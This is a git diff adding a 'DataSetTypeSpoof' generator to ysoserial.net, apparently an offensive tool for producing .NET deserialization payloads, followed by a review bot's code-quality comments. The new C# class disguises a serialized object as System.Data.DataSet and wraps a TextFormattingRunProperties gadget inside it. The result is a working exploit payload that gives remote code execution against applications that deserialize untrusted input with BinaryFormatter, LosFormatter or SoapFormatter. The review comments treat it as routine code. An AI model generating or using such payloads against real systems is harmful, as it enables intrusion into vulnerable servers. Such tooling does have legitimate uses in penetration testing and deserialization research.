diff --git a/README.md b/README.md
index 9683591..bc0533b 100644
--- a/README.md
+++ b/README.md
@@ -46,6 +46,8 @@ ysoserial.net generates deserialization payloads for a variety of .NET formatter
 Formatters: BinaryFormatter , LosFormatter , SoapFormatter
 (*) DataSet
 Formatters: BinaryFormatter , LosFormatter , SoapFormatter
+ (*) DataSetTypeSpoof
+ Formatters: BinaryFormatter , LosFormatter , SoapFormatter
 (*) ObjectDataProvider (supports extra options: use the '--fullhelp' argument to view)
 Formatters: DataContractSerializer (2) , FastJson , FsPickler , JavaScriptSerializer , Json.Net , SharpSerializerBinary , SharpSerializerXml , Xaml (4) , XmlSerializer (2) , YamlDotNet < 5.0.0
 (*) PSObject [Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)]
diff --git a/ysoserial/Generators/DataSetTypeSpoofGenerator.cs b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
new file mode 100644
index 0000000..7c16631
--- /dev/null
+++ b/ysoserial/Generators/DataSetTypeSpoofGenerator.cs
@@ -0,0 +1,102 @@
+using System;
+using System.Collections.Generic;
+using System.Data;
+using System.IO;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+using ysoserial.Helpers;
+
+namespace ysoserial.Generators
+{
+ public class DataSetTypeSpoofGenerator : DataSetGenerator
+ {
+ public override string Name()
+ {
+ return "DataSetTypeSpoof";
+ }
+
+ public override string Contributors()
+ {
+ return "Soroush Dalili, Markus Wulftange, Jang";
+ }
+
+ public override object Generate(string formatter, InputArgs inputArgs)
+ {
+ byte[] init_payload =
+ (byte[]) new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
+ DataSetSpoofMarshal payloadDataSetMarshal = new DataSetSpoofMarshal(init_payload);
+ if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)
+ || formatter.Equals("losformatter", StringComparison.OrdinalIgnoreCase)
+ || formatter.Equals("soapformatter", StringComparison.OrdinalIgnoreCase))
+ {
+ return Serialize(payloadDataSetMarshal, formatter, inputArgs);
+ }
+ else
+ {
+ throw new Exception("Formatter not supported");
+ }
+ }
+ }
+
+ // https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf
+ [Serializable]
+ public class DataSetSpoofMarshal : ISerializable
+ {
+ byte[] _fakeTable;
+
+ public void GetObjectData(SerializationInfo info, StreamingContext context)
+ {
+ // info.SetType(typeof(System.Data.DataSet));
+ info.AssemblyName = "mscorlib";
+ info.FullTypeName = typeof(System.Data.DataSet).AssemblyQualifiedName;
+ info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
+ info.AddValue("DataSet.DataSetName", "");
+ info.AddValue("DataSet.Namespace", "");
+ info.AddValue("DataSet.Prefix", "");
+ info.AddValue("DataSet.CaseSensitive", false);
+ info.AddValue("DataSet.LocaleLCID", 0x409);
+ info.AddValue("DataSet.EnforceConstraints", false);
+ info.AddValue("DataSet.ExtendedProperties", 
(System.Data.PropertyCollection) null);
+ info.AddValue("DataSet.Tables.Count", 1);
+ info.AddValue("DataSet.Tables_0", _fakeTable);
+ }
+
+ public void SetFakeTable(byte[] bfPayload)
+ {
+ _fakeTable = bfPayload;
+ }
+
+ public DataSetSpoofMarshal(byte[] bfPayload)
+ {
+ SetFakeTable(bfPayload);
+ }
+
+ public DataSetSpoofMarshal(object fakeTable) : this(fakeTable, new InputArgs())
+ {
+ // This won't use anything we might have defined in ysoserial.net BinaryFormatter process (such as minification)
+ }
+
+ public DataSetSpoofMarshal(object fakeTable, InputArgs inputArgs)
+ {
+ MemoryStream stm = new MemoryStream();
+ if (inputArgs.Minify)
+ {
+ ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal =
+ new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
+ fmtLocal.Serialize(stm, fakeTable);
+ }
+ else
+ {
+ BinaryFormatter fmt = new BinaryFormatter();
+ fmt.Serialize(stm, fakeTable);
+ }
+
+ SetFakeTable(stm.ToArray());
+ }
+
+ public DataSetSpoofMarshal(MemoryStream ms)
+ {
+ SetFakeTable(ms.ToArray());
+ }
+ }
+}
\ No newline at end of file
diff --git a/ysoserial/ysoserial.csproj b/ysoserial/ysoserial.csproj
index 628729e..f792221 100755
--- a/ysoserial/ysoserial.csproj
+++ b/ysoserial/ysoserial.csproj
@@ -158,6 +158,7 @@
+
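Review bot: DataSetSpoofMarshal's constructors make the stored table depend on the compile-time type of the argument — a `byte[]` is kept as-is, an `object` is first serialized with BinaryFormatter (honouring `inputArgs.Minify`), a `MemoryStream` is copied — and none of them rejects null, so a `byte[]` held in an `object`-typed variable silently takes the serialize-again path and a null argument appears to end up as a null `DataSet.Tables_0` entry. A `<summary>` on the class spelling out those three paths, plus a guard in SetFakeTable such as `if (bfPayload == null) throw new ArgumentNullException(nameof(bfPayload));`, would make the contract explicit. In Generate, `throw new Exception("Formatter not supported")` is better typed as `throw new NotSupportedException("Formatter not supported");`, unless the project's other generators intentionally share the generic form. The `using System.Collections.Generic;` directive looks unused in this file, and the `MemoryStream` in the `(object, InputArgs)` constructor could be wrapped in a `using` statement.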